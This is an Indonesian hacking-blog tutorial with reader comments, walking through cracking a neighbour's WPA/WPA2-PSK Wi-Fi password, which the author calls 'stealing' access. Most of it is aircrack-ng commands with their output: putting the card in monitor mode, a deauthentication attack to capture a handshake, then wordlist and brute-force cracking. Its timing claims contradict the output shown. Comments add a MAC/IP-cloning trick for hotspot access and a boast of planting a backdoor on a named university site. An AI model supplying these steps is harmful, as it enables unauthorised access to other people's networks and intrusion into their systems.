Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Wireless Hacking – Cracking WPA / PSK Key

25 December 2011
Penulis:   · Kategori Artikel: Cracking

BINUS HACKER Binus Hacker Is Not Criminal Banner





Selamat Hari Natal Semuanya! Merry Christmas BinusHacker Family

Pasti begitu banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.

Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda :)
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah)

Download BackTrack 5 Disini:

Download BackTrack 5

Download Wordlist John The Ripper Disini:
Download Wordlist

Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install :)

Wireless Hacking Using BackTrack 5

Oke mari kita lanjutkan:

1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:

root@binushacker:~# airmon-ng start wlan0

Interface Chipset Driver

wlan0 Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)

2. Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut:


root@binushacker:~# airodump-ng mon0

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless

3. Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless

 

root@binushacker:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2

CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless

BSSID STATION PWR Rate Lost Packets Probes

38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless

 

Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:

4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:


root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#

 

5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless

BSSID STATION PWR Rate Lost Packets Probes

38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161

6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:

root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:00:00] 48 keys tested (489.60 k/s)

KEY FOUND! [ W!R3L3$$PWD ]

Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B

EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#

Nah, passwordnya ketemu: W!R3L3$$PWD

7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:

root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:00:22] 11484 keys tested (534.50 k/s)

KEY FOUND! [ W!R3L3$$PWD ]

Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B

EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#

Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD

Untuk lebih detailnya, silakan lihat video berikut:

BINUS HACKER Binus Hacker Chat and Forum

Komentar

68 Komentar Untuk “Wireless Hacking – Cracking WPA / PSK Key
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. fast pro pada 25 December 2011 11:58 am

    weeeeeeih,

    ini akan sangat membantu para pengembang jg pecinta dunia maya,

    terima kasih buat seluruh kru binus hacker

    salam,

  2. newman pada 25 December 2011 5:14 pm

    klo yg pakai windows ada nggak?

  3. wongsoklowor pada 25 December 2011 10:57 pm

    kak binus hacker lo yang pake 098 area code.txt gimana?

  4. arif pada 26 December 2011 12:10 am

    aku takus kalo dual boot pke linux…soalnya dah pernah kejadian data ku ilang semua :D
    ada gk yang buat Windows

  5. arif pada 26 December 2011 12:11 am

    aku takut kalo dual boot pke linux…soalnya dah pernah kejadian data ku ilang semua :D
    ada gk yang buat Windows

  6. ewa pada 27 December 2011 8:50 am

    wahh .. pkee bactrack?? yg versi UBUNTU ada gk mas broo??

    newbii berkarrryaa //

  7. Josly pada 28 December 2011 12:41 am

    gan kalo make wordlist atau gak make wordlist pada saat pengumpulan paswwordnya waktunya sama gak 30 jam??

    kalau mau pakai wordlist apa bisa lebih cepat ya waktu mendapatkan passwordnya??

    makasih gan

  8. taufik pada 28 December 2011 9:15 pm

    kalau wifi samping rmh saya yg ada gambar konci and q pakai xp gimana caranya booss….

  9. 6110118 pada 29 December 2011 11:48 pm

    Tq gan.. lg nyari2 artikel kaya gini nih..

  10. wifi pada 30 December 2011 3:16 am

    Aduh,,,aduh,,, ngajar kog yg gak bgs sih mlh ngajar nyolong…

    Waktu ngehack itu pakai cara ini pasti lama… Apalg kalo password wifi tuh sepanjang kereta api n menggunakan simbol,huruf,angka…

    Kalo aq yg punya wifi aq blacklist mac kamu truz ganti Password alhasil silahkan coba lg… Untung2x gak didatangin truz di omelin…

    Mw yg aman n cepat mending tanya lansung pemilik warung hotspotnya…

  11. a_yodie pada 31 December 2011 3:43 pm

    Maaaantaaabss gan…!!!!!! kebetulan ane lagi nyari reference, blom ane coba sih kalo pake John

  12. Dutafirza pada 4 January 2012 11:22 pm

    coba gan

  13. Pangeran pada 11 January 2012 8:47 pm

    minta ijin kopas gan……………..

  14. semsul pada 15 January 2012 9:04 am

    boss cara install jhon gima carax?

  15. Kids pada 17 January 2012 3:34 am

    izin copadit .. :-)

  16. NT pada 28 January 2012 8:59 am

    waduh mantap gan…..
    maaf bru buka sibuk kerja ma kuliah gan….

  17. ikbal pada 30 January 2012 8:33 am

    ijin copas yc ms bisnus untuk pembelajran lebih lanjut. . ..

  18. tc pada 5 February 2012 12:01 am

    susah nih…
    nggak mengerti caranya…

  19. sandhi pada 5 February 2012 9:45 pm

    nice share gan

  20. reza pada 9 February 2012 7:32 am

    klu cara nghack pasword microtik dengan backtrack gmn ??

    cz bnyk wifi sekarang sistem keamananya udah berbasis microtik.

  21. malie pada 12 February 2012 12:53 am

    gan…ane punya koleksi wordlist, tapi ga ngerti cara mengguanakanya. ada gak solusi dari agan…?

    sebelumnya ane ucapkan terima kasih atas respon dari semua pihak

  22. ucuy pada 20 February 2012 12:59 pm

    om kok pas gw nyobain ni script : airmon-ng start wlan0

    Interface Chipset Driver

    shell nya gak ada reaksi apa apa diem trs,, kenapa yah maklum masih newbie nice info om

  23. Henry pada 21 February 2012 8:27 am

    Thanks Gan,,, Buat Trik Jhon The Riper (JTR) Sangat Membantu,,,

  24. yoga pada 25 February 2012 6:42 am

    kalo cuma mau liat password hotspot pke “wireless key view” cuma tinggal klik aja..

    ane mau tnya klo tuh hotspot di protek pke username sma password,,gmna jebolin nya??

  25. zaki pada 4 March 2012 3:36 am

    apakah menggunakan Mikrotik ?

    caranya adalah menggunakan metode clone ip .. kita samakan MAC address dan IP adress kita dengan MAC & IP address korban ..

    #Semoga membantu ! :)

  26. Blogadexme pada 6 March 2012 12:59 am

    mantap, q paling suka yang ini!
    nice info sobat, dan utk sobat2 yg lain para faceboker lihat disini
    Cara Update Status Facebook Via Sesuka Hati.
    semoga bermanfaat!

  27. shiaboxs pada 9 March 2012 1:23 pm

    hahahahahaha berhasil gan makasih tutor nya gan tanks banget gan hahahahahahahaha

  28. Masterloves pada 10 March 2012 7:06 am

    Selain backtrack silahkan pake black buntu
    eh gan ane tadi abis nanem backdor di http://semut.stmikayani.ac.id kayane tu admin kampus guoblok nya pol.. sasaran empuk tuh gan coba aja…

  29. tuyulz pada 16 March 2012 10:29 pm

    keren nih….sayang ga ada untuk windows…kalo ada share ya gan….:)

  30. amweb pada 30 March 2012 8:48 am

    maju terus binus hacker..jadikan lah teman2 terhadap situs ini sebagai ajang untuk belajar ..bukan untuk kejahatan

  31. anonymous pada 9 April 2012 8:21 pm

    kalo security typenya wpa 2 bisa ga ya?

  32. randa pada 10 April 2012 6:36 am

    waw keren

  33. Mistikerz pada 15 April 2012 10:37 pm

    Ane udah nginstall BT5 R2 GNOME dual boot ma Windows 7 tapi wirelessnya ko gak aktif ya??? padahal klo d Windows 7 gak ada masalah tuh…
    Laptop ane Compaq Presario CQ43 304au
    mohon bantuannya ya para MASTER coz ane baru bgt d linux
    Thx B4

  34. werox pada 25 April 2012 6:34 am

    gan , mau tanya , itu buat windows 7 bisa apa ngak ?
    soal nya bnyakyg suport buat linux , kalau ada yang bisa buat windows 7 , kasih tau gan , , , hehehe

    thx

  35. niko pada 27 April 2012 1:24 am

    Artikel ini sebaiknya jangan disebar. Orang Indonesia (apalagi para nubitol Indonesia) cenderung menggunakan artikel ini untuk tujuan kejahatan daripada manfaat kebaikan.

  36. RIdho6392 pada 28 April 2012 6:49 am

    ane pake VMware ko drivernya ga kedetek yah ??

  37. muhlisanto pada 13 May 2012 10:18 am

    yg lama kunanti kucari ……………………………..thnx ya bro binushacker.net MERDEKA (soalnya ada orang kantor gue yang sering gonta ganti pasw wifi, trus kata teman2 kantor dia sok nguasai server padahal fasilitas kantor, mungkin nenek yang bayar ) 1000 x thns ya bro

  38. sh pada 23 May 2012 3:19 am

    gmana toh mas, katanya pake jhon theripper crackingnya ??itu kan pake aircrack
    @RIdho6392..tdk semua adapter support backtrack,ada juga yang bisa jalan tp gak bs inject paket…
    klw instal di vm jangan lupa seting ke bridge …

  39. g1nt1ng pada 26 May 2012 5:35 pm
  40. adade pada 1 June 2012 1:32 am

    yang mudah dengan bertanya wpa sama admin ya.hehehehhehe

  41. didi pada 26 June 2012 9:38 am

    ada yg tau reaver

  42. joe ilyasa pada 15 July 2012 10:46 am

    assalamualaikum.. mampir biar tambah ilmu,,,,

  43. Riza pada 21 July 2012 1:10 pm

    yang windos ada gk kak??

  44. ENRyu pada 25 July 2012 10:42 am

    gan kalau pas kita type airmon-ng trus interface chipset drive gak ada namany,,itu apanya yang salah ya.., send mail yo thx

  45. lee pada 30 July 2012 9:07 pm

    ijin kopas ya komandan….???? buat belajar. . terima kasih….

  46. zacky pada 5 August 2012 2:41 am

    weh weh weh..

  47. and pada 11 August 2012 1:05 am

    yg android ada g bang?

  48. Axvel Dre pada 4 October 2012 5:34 am

    WOW,. Dah coba namun,.!! gagal,.! he :) Try Again,.! lg ahh,.! he :) happy Hacking,.! mksh kk,.! nice info ea??!!! Salam Hormat dari http://www.cyb3rknight.net

  49. aul pada 18 October 2012 1:59 pm

    kenapa interfacenya chipset drivernya gak pada nongol yaaa?mohon bantuaanya.

  50. BambelBund pada 24 October 2012 2:53 am

    Wahh.. Gde banget 1.9 GB.. Ada yang jual kasetmya gak ya???

  51. ipunk pada 15 November 2012 8:14 am

    mas kalo maumulai cracking wifi itu apa harus seting wifi dahulu…
    #help

  52. Iks pada 13 December 2012 8:51 pm

    gan aq ah nginstall BT5 R2 GNOME dual boot ma Windows 7 tapi wirelessnya ko gak aktif ya???
    waktu nyoba airmon-ng start wlan0

    Interface Chipset Driver gak ada reaksinya ,..
    tulung bantuan e gan???

  53. RamboSality pada 20 December 2012 4:16 pm

    Gan,, Ini Link wordlist JTR nya broken
    ada lagi ga link wordlist nya?

    oiya klo make metode bruteforce gimana ??..

  54. zakau pada 11 January 2013 3:29 pm

    om lw bwt windows 7 ad cara nya ga ?

  55. wali pada 19 January 2013 11:21 am

    Q mau tny ssuatu bisa g kira2 om

  56. Fajrul pada 27 January 2013 6:04 am

    lumayan ambil jaringan tetangga

  57. Lutfi Backtrack Ind pada 17 February 2013 1:37 am

    kok hasil akhirnya gini kak tulisannya :

    Opening /tmp/wpa2-01.cap
    Target network doesn’t seem encrypted.

    Quitting aircrack-ng…

    mohon penjelasannya ….

  58. zigas pada 25 March 2013 8:10 pm

    gan saya mau tanya jika saat kita membobol sebuah pass wireless disuruh untuk memasukkan word list jhon the ripper saat sudah saya masukkan ternyata muncul tulisan ” quit aircrack-ng ” dan gak bisa nemuin passwordnya gimana gan solusinya mohon bantuanya klo bisa kirim ke email zainul.corp@gmail.com saya tunggu gan maju terus

  59. wendi pada 26 March 2013 4:13 am

    pake tol reaver di backtrak 5 aj dong…gk perlu ribet mas brow…tinggl ngopi aja dah bs dpt pass wep/psk2, atau gerix untuk wifi securty tipe wap jd tinggl klik….untuk yg pke windows 7 jgn sedih kan bs dual boot mngunakan vm ware…pokoknya dijamin dehh…tutor cari di youtube banyak skali para jenius yg mau bagi ilmuny..ane pke wifi card type realtek 8187b/g d laptop toshiba l 510 i lawas….wkwkwkw

  60. 12dani pada 7 April 2013 9:00 am

    gan ane mau minta itung itungan buat eks indovisen di jadin antena werles makasihhhhh…. tolong pencerahan nya

  61. Deni Setiawan Putra pada 30 May 2013 5:48 pm

    di bikin ebooknya dunk .pleasse

  62. nono pada 3 June 2013 8:05 pm

    kalau misalnya dari user pakai fasilitas “connect automatically” , pada saat mereka login / logout dari jaringan wireless , itu kira-kira passwordnya bisa diretas tidak ???

  63. edo pada 12 June 2013 8:09 pm

    gan ane minta link john the riper yg bisa di download dong. link yg di atas gk bisa di download .???

  64. Nadhia pada 26 June 2013 10:35 am

    “Mau tanya pak komandan…??Tutorial videonya da nggk..??

  65. Fitri18 pada 28 June 2013 8:10 pm

    Salam knal Bro!
    Info dan masukan nya boleh jg ne,wat nambah2 wwasan & pengetahuan dunia hack.
    tapi mo di coba2 takut2 juga yaa..
    trims aza deehh..

    fitri.

  66. back to track pada 5 August 2013 12:29 am

    Yang masih nanya pakai Windows bisa apa tidak, ke laut aja lu. Yang dibicarakan disini operasi Linux bukan Microsoft, dasar dongo bisanya pakai bajakan.

  67. ferdy pada 14 October 2013 10:22 am

    gak da gunanya password itu klo buat wpa2

  68. kampret pada 7 November 2013 1:23 pm

    heck password wpa2-psk sampai saat in belum ada yg mampu…. jadi jangan mimpi, semua itu bohong.

  69. milestone22 pada 1 June 2014 4:19 am

    wah, kirain WEP doang yang bisa dicrack. ane coba dulu deh pake tutorial binushacker

  70. see kiong pada 31 July 2014 5:16 am

    wah,cara lama masih dipakai,katanya tunggu 30 jam saya rasa 40th kali bahkan ratusan tahun bikin lap top rusak aja,router sekarang proteksinya sudah canggih,kalau gak pake wireshark eapolnya gak di pilah pilih dan di cuci wpa clean,sampai kiamat juga gak ketemu passwordnya

Silahkan Berikan Tanggapan Anda...